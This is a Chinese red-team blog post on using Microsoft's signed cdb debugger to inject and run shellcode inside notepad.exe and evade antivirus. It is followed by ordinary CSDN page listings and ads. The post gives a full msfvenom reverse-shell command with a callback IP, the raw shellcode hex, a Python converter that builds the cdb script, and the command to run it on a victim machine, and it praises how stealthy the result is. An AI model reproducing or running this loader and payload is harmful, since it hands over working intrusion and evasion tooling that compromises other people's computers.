cdb执行shellcode(免杀) | 红队攻防

最新推荐文章于 2024-04-30 14:26:55 发布
最新推荐文章于 2024-04-30 14:26:55 发布
阅读量345 收藏 2
点赞数 16
文章标签: 网络安全 web安全 安全架构 网络攻击模型 安全威胁分析 计算机网络 ddos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jijisaq/article/details/137914862
版权

cdb 是安装 windows debugging tools 时自带的一个命令行调试工具,也是由微软签发证书:

图片

既然是调试工具,那就可以调试指定进程,且在指定进程里分配RWX属性内存并写入shellcode,最后执行该内存中的shellcode。

shell.wds的生成是有固定格式的,首先使用 msf 生成 reverse_tcp 类型的 shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.80.138 LPORT=4444 -f c

去掉 \x 、" 等字符之后,保留原始 shellcode 字符,通过python 进行处理:

import binascii

# 处理过的shellcode 粘贴到这
buf = "fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220480fb74a4a488b72504d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0448b40204901d0508b4818e3564d31c948ffc9418b34884801d64831c041c1c90dac4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b048841584801d041585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d4831db5349be77696e696e65740041564889e149c7c24c772607ffd553534889e1535a4d31c04d31c9535349ba3a5679a700000000ffd5e80f0000003139322e3136382e38302e313338005a4889c149c7c05c1100004d31c953536a035349ba57899fc600000000ffd5e8370000002f46527848493070356b62776a53794a4a5158473264414852684154334150485657346f355873584f384d6263466c7972505a595a33004889c1535a41584d31c95348b8000228840000000050535349c7c2eb552e3bffd54889c66a0a5f535a4889f14d31c94d31c9535349c7c22d06187bffd585c0751f48c7c18813000049ba44f035e000000000ffd548ffcf7402ebcce85500000053596a405a4989d1c1e21049c7c00010000049ba58a453e500000000ffd5489353534889e74889f14889da49c7c0002000004989f949ba129689e200000000ffd54883c42085c074b2668b074801c385c075d258c3586a005949c7c2f0b5a256ffd5"

outfile = open("shell.wds","w")
outfile.write(".foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }"+"\n")
num = (int)(len(buf)/2)
count = 0

for i in range(num):
    flag = count%4
    if flag == 0:
        outfile.write("\n")
    if count < 16:
        sc_count = "0" + hex(count).upper()
    else:
        sc_count = hex(count).upper()
    x = ";eb @$t0+" + sc_count + " " + buf[i*2:i*2+2].upper()
    count = count + 1
    x= x.replace("0X","")
    outfile.write(x)
extra = num%4
if extra!=0:
    for j in range(4-extra):
        sc_count = hex(count).upper()
        count = count+1
        x = ";eb @$t0+" + sc_count + " 00"
        x = x.replace("0X", "")
        outfile.write(x)

outfile.write("\n" + "r @$ip=@$t0"+"\n")
outfile.write("g"+"\n")
outfile.write("g"+"\n")
outfile.write("q")

生成shell.wds文件后,将 cdb 和 wds 文件复制到被害机器中,执行:

cdb.exe -pd -cf shell.wds -o notepad.exe

可以看到正常上线:

图片

查看受害机器进程:

图片

可以看到是在 notepad 进程中存在 tcp 连接,隐蔽性相对较高,且由于shellcode没明显特征,cdb 有签名,因此免杀效果很好。

 「你即将失去如下所有学习变强机会」

学习效率低,学不到实战内容,花几千、上万报机构没有性价比

一顿自助钱,我承诺一定让用户满意,也希望用户能给予我一份信任

【详情下方图片了解】,【扫下方二维码加入】:只做高质量优质精品内容」

 

免费红队知识库:
 

 

 

 

 

 

 

免责声明
 

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

                

        

        

    




    

      

        

            

              
                
                  吉吉说安全
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    16
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    2
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
PHP WebShell 免杀

				
			

			

				

					悦分享
				

				

					08-01
					
					5372
					
				

			

		

		

			
				
一般的,利用能够执行系统命令、加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做Webshell。而php做为一门动态语言,其灵活性很高,因此一直以来Webshell的绕过与检测之间不断的产生着化学反应。Webshell绕过的本质其实是针对不同的检测给予不同的绕过方式,因此首先要了解Webshell是如何检测的。...

			
		

	



                

              
                



	

		

			

				
					
Oracle 12c CDB 与 PDB 管理

				
			

			

				

					03-04
				

			

		

		

			
				
Oracle 12c CDB 与 PDB 管理

			
		

	



                


  
              

                


	

		

			

				
					
pyinstaller打包逆向分析,顺便免杀Windows Defender

				
			

			

				

					crowsec
				

				

					02-10
					
					3096
					
				

			

		

		

			
				
本文使用了最基本的shellcode加载器免杀的方法,而且一起学习了pyinstaller打包exe的反编译方式,也顺便免杀了火绒、360、Windows Defender,当然从该文章发出来的那一刻起,可能免杀就不再有效了,不过,方法千千万,免杀没有那么难。

			
		

	





	

		

			

				
					
pyinstaller打包exe免杀和逆向浅析

				
			

			

				

					crowsec
				

				

					01-27
					
					6546
					
				

			

		

		

			
				
本文主要对pyinstaller打包的文件进行了超简单逆向分析,在这里也有一些免杀的小小的tips,其中也参考了诸多的资料,不乏有诸多错误,希望各位师傅能够批评指正。

			
		

	



		

			
		



	

		

			

				
					
qtCreator安装windows sdk cdb

				
			

			

				

					qikaihuting的博客
				

				

					11-23
					
					2395
					
				

			

		

		

			
				
window安装debugger cdb.exe

			
		

	





	

		

			

				
					
cdb.exe的利用

				
			

			

				

					weixin_44747030的博客
				

				

					12-27
					
					971
					
				

			

		

		

			
				
cdb.exe的利用

			
		

	





	

		

			

				
					
IC617 將數據從CDB轉換為OA

				
			

			

				

					10-15
				

			

		

		

			
				
IC617 將數據從CDB轉換為OA

			
		

	





	

		

			

				
					
Oracle12c CDB架构

				
			

			

				

					03-04
				

			

		

		

			
				
Oracle12c CDB架构

			
		

	





	

		

			

				
					
CDB.rar_cdb  _cdb数据库_cdb课程

				
			

			

				

					09-20
				

			

		

		

			
				
数据库系统概念课程的全面总结,适用于考前复习

			
		

	





	

		

			

				
					
Oracle 19c CDB RAC To RAC ActiveDataguard部署方案

				
			

			

				

					05-31
				

			

		

		

			
				
Oracle 19c CDB RAC To RAC ActiveDataguard部署方案

			
		

	





	

		

			

				
					
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》

				
			

			

				

					weixin_59086772的博客
				

				

					10-18
					
					8190
					
				

			

		

		

			
				
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。

今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。







一、网络安全行业市场发展情况

网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

			
		

	





	

		

			

				
					
网络安全安全事件管理处置 — 安全事件处置思路指导

				
			

			

				

					享你所想
				

				

					04-26
					
					703
					
				

			

		

		

			
				
一、处理DDOS事件

1.准备工作

2.预防工作

3.检测与分析

4.限制、消除

5.证据收集

二、处理恶意代码事件

1.准备

2.预防

3.检测与分析

4.限制

5.证据收集

6.消除与恢复

三、处理未授权访问事件

1.准备

2.预防

3.检测与分析

4.限制、消除

5.证据收集

6.恢复

四、处理复合型安全事件

1.建议

			
		

	





	

		

			

				
					
网络安全与密码学--AES加密

				
			

			

				

					weixin_61074128的博客
				

				

					04-22
					
					944
					
				

			

		

		

			
				
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。

			
		

	





	

		

			

				
					
ChatGPT 网络安全秘籍(二)

				
			

			

				

					龙哥盟
				

				

					04-30
					
					249
					
				

			

		

		

			
				
本方法中概述的原则和结构可以针对各种项目和编程语言进行定制。例如,如果您正在使用 JavaScript 开发电子商务平台,您可以调整提示中的上下文以适应该场景。

			
		

	





	

		

			

				
					
匠心精神与创新力量:构筑网络安全的新防线

				
			

			

				

					weixin_51347473的博客
				

				

					04-30
					
					154
					
				

			

		

		

			
				
在数字化时代,随着技术的飞速发展,网络安全问题日益凸显,成为全球关注的焦点。2024年哈经开区十大匠心提名之一的亿林网络李璐昆,正是在这样的背景下,以其匠心精神和创新实践,为网络安全领域贡献了重要力量。

			
		

	





	

		

			

				
					
网络安全之弱口令与命令爆破(上篇)(技术进阶)

				
			

			

				

					weixin_70911257的博客
				

				

					04-25
					
					1427
					
				

			

		

		

			
				
小小狗蛋可笑可笑

			
		

	





	

		

			

				
					
网络安全知识点

				
			

			

				

					lv785的博客
				

				

					04-26
					
					868
					
				

			

		

		

			
				
概念:IPSec 是“IP 安全”的缩写,是IETF在开发 IPv6时为保证IP数据报安全而设计的,是IPv6的一个组成 部分、是IPv4的可选项,其基本目的就是把安全机制引入 IP协议。欺骗:指利用主机之间的正常信任关系,通过修改IP数据包中的源地址,以绕开主机或网络访问控制、隐藏攻击来源的攻击技术。概念:入侵检测就是对入侵行为的 检测与发现,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。简要分析RSA算法的安全性得以保障的原因。

			
		

	





	

		

			

				
					
web安全】-- 命令执行漏洞详解

					
最新发布

				
			

			

				

					m0_72286569的博客
				

				

					04-30
					
					370
					
				

			

		

		

			
				
命令执行漏洞是一种网络安全漏洞,它允许攻击者在受影响的系统上执行恶意命令。这种漏洞通常出现在软件应用程序或系统中,其典型示例是 Web 应用程序中的远程命令执行(RCE)漏洞。

			
		

	





	

		

			

				
					
ChatGPT 网络安全秘籍(四)

				
			

			

				

					龙哥盟
				

				

					04-30
					
					504
					
				

			

		

		

			
				
原文:zh.annas-archive.org/md5/6b2705e0d6d24d8c113752f67b42d7d8
译者:飞龙
协议:CC BY-NC-SA 4.0

第八章:事故响应
事故响应是任何网络安全策略的关键组成部分,涉及确定、分析和缓解安全漏洞或攻击。 及时和有效地响应事故对于最小化损害和防止未来攻击至关重要。 在本章中,我们将深入探讨如何利用 ChatGPT 和 OpenAI 的 API 来增强事故响应过程的各个方面。
我们将首先探讨 ChatGPT 如何协助进行事故分析和分类,提供快

			
		

	





	

		

			

				
					
Oracle CDB

				
			

			

				

					03-29
				

			

		

		

			
				
Oracle CDB(Container Database)是Oracle数据库中的一个重要概念,它引入了多租户架构,允许在一个数据库实例中创建多个独立的容器数据库(PDB,Pluggable Database)。每个PDB都是一个独立的数据库,具有自己的数据字典和系统表空间。

CDB包含两个主要的部分:CDB根和PDB。CDB根是整个多租户数据库的主要组成部分,它包含了共享的系统表空间和数据字典。而PDB则是CDB根下的一个或多个独立数据库,每个PDB都有自己的用户表空间和数据文件。

通过使用CDB,可以实现资源共享、简化管理和降低成本。多个PDB可以共享CDB根的资源,如内存和CPU。此外,CDB还提供了一些特性,如统一的安全管理、统一的备份和恢复、统一的升级和补丁等。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
吉吉说安全

			
感谢打赏,交个朋友!有困难找我

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值